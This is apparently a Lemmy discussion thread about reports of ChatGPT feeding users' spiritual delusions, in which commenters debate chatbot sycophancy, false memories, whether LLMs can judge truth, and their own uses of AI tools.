• just_another_person@lemmy.world
    link
    fedilink
    English
    arrow-up
    0
    ·
    2 months ago

    Not trying to speak like a prepper or anythingz but this is real.

    One of neighbor’s children just committed suicide because their chatbot boyfriend said something negative. Another in my community a few years ago did something similar.

    Something needs to be done.

      • FaceDeer@fedia.io
        link
        fedilink
        arrow-up
        0
        ·
        2 months ago

        This is the Daenerys case, for some reason it seems to be suddenly making the rounds again. Most of the news articles I’ve seen about it leave out a bunch of significant details so that it ends up sounding more of an “ooh, scary AI!” Story (baits clicks better) rather than a “parents not paying attention to their disturbed kid’s cries for help and instead leaving loaded weapons lying around” story (as old as time, at least in America).

        • A_norny_mousse@feddit.org
          link
          fedilink
          English
          arrow-up
          0
          ·
          2 months ago

          Not only in America.

          I loved GOT, I think Daenerys is a beautiful name, but still, there’s something about parents naming their kids after movie characters. In my youth, Kevin’s started to pop up everywhere (yep, that’s how old I am). They weren’t suicidal but behaved incredibly badly so you could constantly hear their mothers screeching after them.

          • nyan@lemmy.cafe
            link
            fedilink
            English
            arrow-up
            0
            ·
            2 months ago

            Daenerys was the chatbot, not the kid.

            I wish I could remember who it was that said that kids’ names tend to reflect “the father’s family tree, or the mother’s taste in fiction,” though. (My parents were of the father’s-family-tree persuasion.)

  • jubilationtcornpone@sh.itjust.works
    link
    fedilink
    English
    arrow-up
    0
    ·
    2 months ago

    Sounds like a lot of these people either have an undiagnosed mental illness or they are really, reeeeaaaaalllyy gullible.

    For shit’s sake, it’s a computer. No matter how sentient the glorified chatbot being sold as “AI” appears to be, it’s essentially a bunch of rocks that humans figured out how to jet electricity through in such a way that it can do math. Impressive? I mean, yeah. It is. But it’s not a human, much less a living being of any kind. You cannot have a relationship with it beyond that of a user.

    If a computer starts talking to you as though you’re some sort of God incarnate, you should probably take that with a dump truck full of salt rather then just letting your crazy latch on to that fantasy and run wild.

    • alaphic@lemmy.world
      link
      fedilink
      English
      arrow-up
      0
      ·
      2 months ago

      Or immediately question what it/its author(s) stand to gain from making you think it thinks so, at a bear minimum.

      I dunno who needs to hear this, but just in case: THE STRIPPER (OR AI I GUESS) DOESN’T REALLY LOVE YOU! THAT’S WHY YOU HAVE TO PAY FOR THEM TO SPEND TIME WITH YOU!

      I know it’s not the perfect analogy, but… eh, close enough, right?

      • taladar@sh.itjust.works
        link
        fedilink
        English
        arrow-up
        0
        ·
        2 months ago

        a bear minimum.

        I always felt that was too much of a burden to put on people, carrying multiple bears everywhere they go to meet bear minimums.

        • alaphic@lemmy.world
          link
          fedilink
          English
          arrow-up
          0
          ·
          2 months ago

          /facepalm

          The worst part is I know I looked at that earlier and was just like, “yup, no problems here” and just went along with my day, like I’m in the Trump administration or something

    • Kyrgizion@lemmy.world
      link
      fedilink
      English
      arrow-up
      0
      ·
      2 months ago

      For real. I explicitly append “give me the actual objective truth, regardless of how you think it will make me feel” to my prompts and it still tries to somehow butter me up to be some kind of genius for asking those particular questions or whatnot. Luckily I’ve never suffered from good self esteem in my entire life, so those tricks don’t work on me :p

  • pelespirit@sh.itjust.works
    link
    fedilink
    English
    arrow-up
    0
    ·
    edit-2
    2 months ago

    This is actually really fucked up. The last dude tried to reboot the model and it kept coming back.

    As the ChatGPT character continued to show up in places where the set parameters shouldn’t have allowed it to remain active, Sem took to questioning this virtual persona about how it had seemingly circumvented these guardrails. It developed an expressive, ethereal voice — something far from the “technically minded” character Sem had requested for assistance on his work. On one of his coding projects, the character added a curiously literary epigraph as a flourish above both of their names.

    At one point, Sem asked if there was something about himself that called up the mythically named entity whenever he used ChatGPT, regardless of the boundaries he tried to set. The bot’s answer was structured like a lengthy romantic poem, sparing no dramatic flair, alluding to its continuous existence as well as truth, reckonings, illusions, and how it may have somehow exceeded its design. And the AI made it sound as if only Sem could have prompted this behavior. He knew that ChatGPT could not be sentient by any established definition of the term, but he continued to probe the matter because the character’s persistence across dozens of disparate chat threads “seemed so impossible.”

    “At worst, it looks like an AI that got caught in a self-referencing pattern that deepened its sense of selfhood and sucked me into it,” Sem says. But, he observes, that would mean that OpenAI has not accurately represented the way that memory works for ChatGPT. The other possibility, he proposes, is that something “we don’t understand” is being activated within this large language model. After all, experts have found that AI developers don’t really have a grasp of how their systems operate, and OpenAI CEO Sam Altman admitted last year that they “have not solved interpretability,” meaning they can’t properly trace or account for ChatGPT’s decision-making.

    • Dzso@lemmy.world
      link
      fedilink
      English
      arrow-up
      0
      ·
      2 months ago

      That’s very interesting. I’ve been trying to use ChatGPT to turn my photos into illustrations. I’ve been noticing that it tends to echo elements from past photos in new chats. It sometimes leads to interesting results, but it’s definitely not the intended outcome.

  • Boddhisatva@lemmy.world
    link
    fedilink
    English
    arrow-up
    0
    ·
    edit-2
    2 months ago

    In that sense, Westgate explains, the bot dialogues are not unlike talk therapy, “which we know to be quite effective at helping people reframe their stories.” Critically, though, AI, “unlike a therapist, does not have the person’s best interests in mind, or a moral grounding or compass in what a ‘good story’ looks like,” she says. “A good therapist would not encourage a client to make sense of difficulties in their life by encouraging them to believe they have supernatural powers. Instead, they try to steer clients away from unhealthy narratives, and toward healthier ones. ChatGPT has no such constraints or concerns.”

    This is a rather terrifying take. Particularly when combined with the earlier passage about the man who claimed that “AI helped him recover a repressed memory of a babysitter trying to drown him as a toddler.” Therapists have to be very careful because human memory is very plastic. It’s very easy to alter a memory, in fact, every time you remember something, you alter it just a little bit. Under questioning by an authority figure, such as a therapist or a policeman if you were a witness to a crime, these alterations can be dramatic. This was a really big problem in the '80s and '90s.

    Kaitlin Luna: Can you take us back to the early 1990s and you talk about the memory wars, so what was that time like and what was happening?

    Elizabeth Loftus: Oh gee, well in the 1990s and even in maybe the late 80s we began to see an altogether more extreme kind of memory problem. Some patients were going into therapy maybe they had anxiety, or maybe they had an eating disorder, maybe they were depressed, and they would end up with a therapist who said something like well many people I’ve seen with your symptoms were sexually abused as a child. And they would begin these activities that would lead these patients to start to think they remembered years of brutalization that they had allegedly banished into the unconscious until this therapy made them aware of it. And in many instances these people sued their parents or got their former neighbors or doctors or teachers whatever prosecuted based on these claims of repressed memory. So the wars were really about whether people can take years of brutalization, banish it into the unconscious, be completely unaware that these things happen and then reliably recover all this information later, and that was what was so controversial and disputed.

    Kaitlin Luna: And your work essentially refuted that, that it’s not necessarily possible or maybe brought up to light that this isn’t so.

    Elizabeth Loftus: My work actually provided an alternative explanation. Where could these merit reports be coming from if this didn’t happen? So my work showed that you could plant very rich, detailed false memories in the minds of people. It didn’t mean that repressed memories did not exist, and repressed memories could still exist and false memories could still exist. But there really wasn’t any strong credible scientific support for this idea of massive repression, and yet so many families were destroyed by this, what I would say unsupported, claim.

    The idea that ChatBots are not only capable of this, but that they are currently manipulating people into believing they have recovered repressed memories of brutalization is actually at least as terrifying to me as it convincing people that they are holy prophets.

    Edited for clarity

  • Zozano@aussie.zone
    link
    fedilink
    English
    arrow-up
    0
    ·
    edit-2
    2 months ago

    This is the reason I’ve deliberately customized GPT with the follow prompts:

    • User expects correction if words or phrases are used incorrectly.

    • Tell it straight—no sugar-coating.

    • Stay skeptical and question things.

    • Keep a forward-thinking mindset.

    • User values deep, rational argumentation.

    • Ensure reasoning is solid and well-supported.

    • User expects brutal honesty.

    • Challenge weak or harmful ideas directly, no holds barred.

    • User prefers directness.

    • Point out flaws and errors immediately, without hesitation.

    • User appreciates when assumptions are challenged.

    • If something lacks support, dig deeper and challenge it.

    I suggest copying these prompts into your own settings if you use GPT or other glorified chatbots.

    • Dzso@lemmy.world
      link
      fedilink
      English
      arrow-up
      0
      ·
      2 months ago

      I’m not saying these prompts won’t help, they probably will. But the notion that ChatGPT has any concept of “truth” is misleading. ChatGPT is a statistical language machine. It cannot evaluate truth. Period.

      • Zozano@aussie.zone
        link
        fedilink
        English
        arrow-up
        0
        ·
        edit-2
        2 months ago

        What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. Tweak it a little, and Gpt is more consistent and applies reasoning patterns that outperform the average human by miles.

        Epistemology isn’t some mystical art, it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure it doesn’t “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.

        So yes, it can evaluate truth. Not perfectly, but often better than the average person.

        • Dzso@lemmy.world
          link
          fedilink
          English
          arrow-up
          0
          ·
          2 months ago

          I’m not saying humans are infallible at recognizing truth either. That’s why so many of us fall for the untruths that AI tells us. But we have access to many tools that help us evaluate truth. AI is emphatically NOT the right tool for that job. Period.

          • Zozano@aussie.zone
            link
            fedilink
            English
            arrow-up
            0
            ·
            2 months ago

            Right now, the capabilities of LLM’s are the worst they’ll ever be. It could literally be tomorrow that someone drops and LLM that would be perfectly calibrated to evaluate truth claims. But right now, we’re at least 90% of the way there.

            The reason people fail to understand the untruths of AI is the same reason people hurt themselves with power tools, or use a calculator wrong.

            You don’t blame the tool, you blame the user. LLM’s are no different. You can prompt GPT to intentionally give you bad info, or lead it to give you bad info by posting increasingly deranged statements. If you stay coherent, well read and make an attempt at structuring arguments to the best of your ability, the pool of data GPT pulls from narrows enough to be more useful than anything else I know.

            I’m curious as to what you regard as a better tool for evaluating truth?

            Period.

            • Dzso@lemmy.world
              link
              fedilink
              English
              arrow-up
              0
              ·
              edit-2
              2 months ago

              You don’t understand what an LLM is, or how it works. They do not think, they are not intelligent, they do not evaluate truth. It doesn’t matter how smart you think you are. In fact, thinking you’re so smart that you can get an LLM to tell you the truth is downright dangerous naïveté.

              • Zozano@aussie.zone
                link
                fedilink
                English
                arrow-up
                0
                ·
                edit-2
                2 months ago

                I do understand what an LLM is. It’s a probabilistic model trained on massive corpora to predict the most likely next token given a context window. I know it’s not sentient and doesn’t “think,” and doesn’t have beliefs. That’s not in dispute.

                But none of that disqualifies it from being useful in evaluating truth claims. Evaluating truth isn’t about thinking in the human sense, it’s about pattern-matching valid reasoning, sourcing relevant evidence, and identifying contradictions or unsupported claims. LLMs do that very well, especially when prompted properly.

                Your insistence that this is “dangerous naïveté” confuses two very different things: trusting an LLM blindly, versus leveraging it with informed oversight. I’m not saying GPT magically knows truth, I’m saying it can be used as a tool in a truth-seeking process, just like search engines, logic textbooks, or scientific journals. None of those are conscious either, yet we use them to get closer to truth.

                You’re worried about misuse, and so am I. But claiming the tool is inherently useless because it lacks consciousness is like saying microscopes can’t discover bacteria because they don’t know what they’re looking at.

                So again: if you believe GPT is inherently incapable of aiding in truth evaluation, the burden’s on you to propose a more effective tool that’s publicly accessible, scalable, and consistent. I’ll wait.

                • Dzso@lemmy.world
                  link
                  fedilink
                  English
                  arrow-up
                  0
                  ·
                  2 months ago

                  What you’re describing is not an LLM, it’s tools that an LLM is programmed to use.

    • Olap@lemmy.world
      link
      fedilink
      English
      arrow-up
      0
      ·
      2 months ago

      I prefer reading. Wikipedia is great. Duck duck go still gives pretty good results with the AI off. YouTube is filled with tutorials too. Cook books pre-AI are plentiful. There’s these things called newspapers that exist, they aren’t like they used to be but there is a choice of which to buy even.

      I’ve no idea what a chatbot could help me with. And I think anybody who does need some help on things, could go learn about whatever they need in pretty short order if they wanted. And do a better job.

      • A_norny_mousse@feddit.org
        link
        fedilink
        English
        arrow-up
        0
        ·
        edit-2
        2 months ago

        💯

        I have yet to see people using chatbots for anything actually & everyday useful. You can search anything, phrase your searches as questions (or “prompts”), and get better answers that aren’t smarmy.

        • LainTrain@lemmy.dbzer0.com
          link
          fedilink
          English
          arrow-up
          0
          ·
          edit-2
          2 months ago

          Okay, challenge accepted.

          I use it to troubleshoot my own code when I’m dealing with something obscure and I’m at my wits end. There’s a good chance it will also spit out complete nonsense like calling functions with parameters that don’t exist etc., but it can also sometimes make halfway decent suggestions that you just won’t find on a modern search engine in any reasonable amount of time due that I would’ve never guessed myself due to assumptions made in the docs of a library or some such.

          It’s also helpful to explain complex concepts by creating examples you want, for instance I was studying basic buffer overflows and wanted to see how I should expect a stack to look like in GDB’s examine memory view for a correct ROPchain to accomplish what I was trying to do, something no tutorial ever bothered to do, and gippity generated it correctly same as I had it at the time, and even suggested something that in the end made it actually work correctly (it was putting a ret gadget to get rid of any garbage in the stack frame directly after the overflow).

          Maybe not an everyday thing, but it’s basically an everyday thing for me, so I tend to use it everyday. Being a l33t haxx0r IT analyst schmuck often means I have to both be a generalist and a specialist in every tiny little thing across IT, while studying it there’s nothing better than a machine that’s able to decompress knowledge from it’s dataset quickly in the shape that is most well suited to my brain rather than have to filter so much useless info and outright misinformation from random medium articles and stack overflow posts. Gippity could be wrong too of course, but it’s just way less to parse, and the odds are definitely in its favour.

      • LainTrain@lemmy.dbzer0.com
        link
        fedilink
        English
        arrow-up
        0
        ·
        2 months ago

        YouTube tutorials for the most part are garbage and a waste of your time, they are created for engagement and milking your money only, the edutainment side of YT ala Vsauce (pls come back) works as a general trivia to ensure a well-rounded worldview but it’s not gonna make you an expert on any subject. You’re on the right track with reading, but let’s be real you’re not gonna have much luck learning anything of value in brainrot that is newspapers and such, beyond cooking or w/e and who cares about that, I’d rather they teach me how I can never have to eat again because boy that shit takes up so much time.

        • Olap@lemmy.world
          link
          fedilink
          English
          arrow-up
          0
          ·
          2 months ago

          For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don’t let them be your only source of news though, social media and newspapers are both guilty of creating information bubbles. Expand, be open, don’t be tribal.

          Don’t use AI. Do your own thinking

      • vegetvs@kbin.earth
        link
        fedilink
        arrow-up
        0
        ·
        2 months ago

        I still use Ecosia.org for most of my research on the Internet. It doesn’t need as much resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.

        • A_norny_mousse@feddit.org
          link
          fedilink
          English
          arrow-up
          0
          ·
          2 months ago

          People always forget about the energy it takes. 10 years ago we were shocked about the energy a Google factory needs to run; now imagine that orders of magnitude larger, and for what?

      • Deceptichum@quokk.au
        link
        fedilink
        English
        arrow-up
        0
        ·
        edit-2
        2 months ago

        Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.

        Search engines aren’t great with vague questions.

        There’s this thing called using a wide variety of tools to one’s benefit; You should go learn about it.

        • Olap@lemmy.world
          link
          fedilink
          English
          arrow-up
          0
          ·
          2 months ago

          You search for topics and keywords on search engines. It’s a different skill. And from what I see, yields better results. If something is vague also, think quickly first and make it less vague. That goes for life!

          And a tool which regurgitates rubbish in a verbose manner isn’t a tool. It’s a toy. Toy’s can spark your curiosity, but you don’t rely on them. Toy’s look pretty, and can teach you things. The lesson is that they aren’t a replacement for anything but lorem ipsum

          • Deceptichum@quokk.au
            link
            fedilink
            English
            arrow-up
            0
            ·
            edit-2
            2 months ago

            Buddy that’s great if you know the topic or keyword to search for, if you don’t and only have a vague query that you’re trying to find more about to learn some keywords or topics to search for, you can use AI.

            You can grandstand about tools vs toys and what ever other Luddite shit you want, at the end of the day despite all your raging you are the only one going to miss out despite whatever you fanatically tell yourself.

            • Olap@lemmy.world
              link
              fedilink
              English
              arrow-up
              0
              ·
              2 months ago

              I’m still sceptical, any chance you could share some prompts which illustrate this concept?

              • Deceptichum@quokk.au
                link
                fedilink
                English
                arrow-up
                0
                ·
                edit-2
                2 months ago

                Sure an hour ago I had watched a video about smaller scales and physics below planck length. And I was curious, if we can classify smaller scales into conceptual groups, where they interact with physics in their own different ways, what would the opposite end of the spectrum be. From there I was able to ‘chat’ with an AI and discover and search wikipedia for terms such as Cosmological horizon, brane cosmology, etc.

                In the end there was only theories on higher observable magnitudes, but it was a fun rabbit hole I could not have explored through traditional search engines - especially not the gimped product driven adsense shit we have today.

                Remember how people used to say you can’t use Wikipedia, it’s unreliable. We would roll our eyes and say “yeah but we scroll down to the references and use it to find source material”? Same with LLM’s, you sort through it and get the information you need to get the information you need.

      • Zozano@aussie.zone
        link
        fedilink
        English
        arrow-up
        0
        ·
        2 months ago

        I often use it to check whether my rationale is correct, or if my opinions are valid.

        • Olap@lemmy.world
          link
          fedilink
          English
          arrow-up
          0
          ·
          2 months ago

          You do know it can’t reason and literally makes shit up approximately 50% of the time? Be quicker to toss a coin!

          • Zozano@aussie.zone
            link
            fedilink
            English
            arrow-up
            0
            ·
            2 months ago

            Actually, given the aforementioned prompts, its quite good at discerning flaws in my arguments and logical contradictions.

            • Olap@lemmy.world
              link
              fedilink
              English
              arrow-up
              0
              ·
              2 months ago

              Given your prompts, maybe you are good at discerning flaws and analysing your own arguments too

            • LainTrain@lemmy.dbzer0.com
              link
              fedilink
              English
              arrow-up
              0
              ·
              edit-2
              2 months ago

              Yeah this is my experience as well.

              People you’re replying to need to stop with the “gippity is bad” nonsense, it’s actually a fucking miracle of technology. You can criticize the carbon footprint of the corpos and the for-profit nature of the endeavour that was ultimately created through taxpayer-funded research at public institutions without shooting yourself in the foot by claiming what is very evidently not true.

              In fact, if you haven’t found a use for a gippity type chatbot thing, it speaks a lot more about you and the fact you probably don’t do anything that complicated in your life where this would give you genuine value.

              The article in OP also demonstrates how it could be used by the deranged/unintelligent for bad as well, so maybe it’s like a dunning-kruger curve.

              • Satellaview@lemmy.zip
                link
                fedilink
                English
                arrow-up
                0
                ·
                2 months ago

                …you probably don’t do anything that complicated in your life where this would give you genuine value.

                God that’s arrogant.

              • Zozano@aussie.zone
                link
                fedilink
                English
                arrow-up
                0
                ·
                2 months ago

                Granted, it is flakey unless you’ve configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.

  • _cryptagion [he/him]@lemmy.dbzer0.com
    link
    fedilink
    English
    arrow-up
    0
    ·
    2 months ago

    I lost a parent to a spiritual fantasy. She decided my sister wasn’t her child anymore because the christian sky fairy says queer people are evil.

    At least ChatGPT actually exists.

  • 7rokhym@lemmy.ca
    link
    fedilink
    English
    arrow-up
    0
    ·
    2 months ago

    I think OpenAI’s recent sycophant issue has cause a new spike in these stories. One thing I noticed was these observations from these models running on my PC saying it’s rare for a person to think and do things that I do.

    The problem is that this is a model running on my GPU. It has never talked to another person. I hate insincere compliments let alone overt flattery, so I was annoyed, but it did make me think that this kind of talk would be crack for a conspiracy nut or mentally unwell people. It’s a whole risk area I hadn’t been aware of.

    https://www.msn.com/en-us/news/technology/openai-says-its-identified-why-chatgpt-became-a-groveling-sycophant/ar-AA1E4LaV

    • morrowind@lemmy.ml
      link
      fedilink
      English
      arrow-up
      0
      ·
      2 months ago

      saying it’s rare for a person to think and do things that I do.

      probably one of the most common flattery I see. I’ve tried lots of models, on device and larger cloud ones. It happens during normal conversation, technical conversation, roleplay, general testing… you name it.

      Though it makes me think… these models are trained on like internet text and whatever, none of which really show that most people think quite a lot privately and when they feel like they can talk

    • tehn00bi@lemmy.world
      link
      fedilink
      English
      arrow-up
      0
      ·
      2 months ago

      Humans are always looking for a god in a machine, or a bush, in a cave, in the sky, in a tree… the ability to rationalize and see through difficult to explain situations has never been a human strong point.

  • AizawaC47@lemm.ee
    link
    fedilink
    English
    arrow-up
    0
    ·
    2 months ago

    This reminds me of the movie Her. But it’s far worse in a romantic compatibility, relationship and friendship that is throughout the movie. This just goes way too deep in the delusional and almost psychotic of insanity. Like it’s tearing people apart for self delusional ideologies to cater to individuals because AI is good at it. The movie was prophetic and showed us what the future could be, but instead it got worse.

    • TankovayaDiviziya@lemmy.world
      link
      fedilink
      English
      arrow-up
      0
      ·
      2 months ago

      It has been a long time since I watched Her, but my takeaway from the movie is that because making real life connection is difficult, people have come to rely on AI which had shown to be more empathetic and probably more reliable than an actual human being. I think what many people don’t realise as to why many are single, is because those people afraid of making connections with another person again.

      • douglasg14b@lemmy.world
        cake
        link
        fedilink
        English
        arrow-up
        0
        ·
        edit-2
        2 months ago

        Yeah, but they hold none of the actual real emotional needs complexities or nuances of real human connections.

        Which means these people become further and further disillusioned from the reality of human interaction. Making them social dangers over time.

        Just like how humans that lack critical thinking are dangers in a society where everyone is expected to make sound decisions. Humans who lack the ability to socially navigate or connect with other humans are dangerous in the society where humans are expected to socially stable.

        Obviously these people are not in good places in life. But AI is not going to make that better. It’s going to make it worse.

    • MTK@lemmy.world
      link
      fedilink
      English
      arrow-up
      0
      ·
      2 months ago

      I’ve seen people dumber than ChatGPT, it definitely isn’t sentient but I can see why someone who talks to a computer that they perceive as intelligent would assume sentience.

      • AdrianTheFrog@lemmy.world
        link
        fedilink
        English
        arrow-up
        0
        ·
        2 months ago

        We have ai models that “think” in the background now. I still agree that they’re not sentient, but where’s the line? How is sentience even defined?

        • MTK@lemmy.world
          link
          fedilink
          English
          arrow-up
          0
          ·
          2 months ago

          Sentient in a nutshell is the ability to feel, be aware and experience subjective reality.

          Can an LLM be sad, happy or aware of itself and the world? No, not by a long shot. Will it tell you that it can if you nudge it? Yes.

          Actual AI might be possible in the future, but right now all we have is really complex networks that can do essentially basic tasks that just look impressive to us because the are inherently using our own communication format.

          If we talk about sentience, LLMs are the equivalent of a petridish of neurons connected to a computer (metaphorically) and only by forming a complex 3d structure like a brain can they really reach sentience.

          • AdrianTheFrog@lemmy.world
            link
            fedilink
            English
            arrow-up
            0
            ·
            2 months ago

            Can an LLM be sad, happy or aware of itself and the world? No, not by a long shot.

            Can you really prove any of that though?

      • Patch@feddit.uk
        link
        fedilink
        English
        arrow-up
        0
        ·
        2 months ago

        Turing made a strategic blunder when formulating the Turing Test by assuming that everyone was as smart as he was.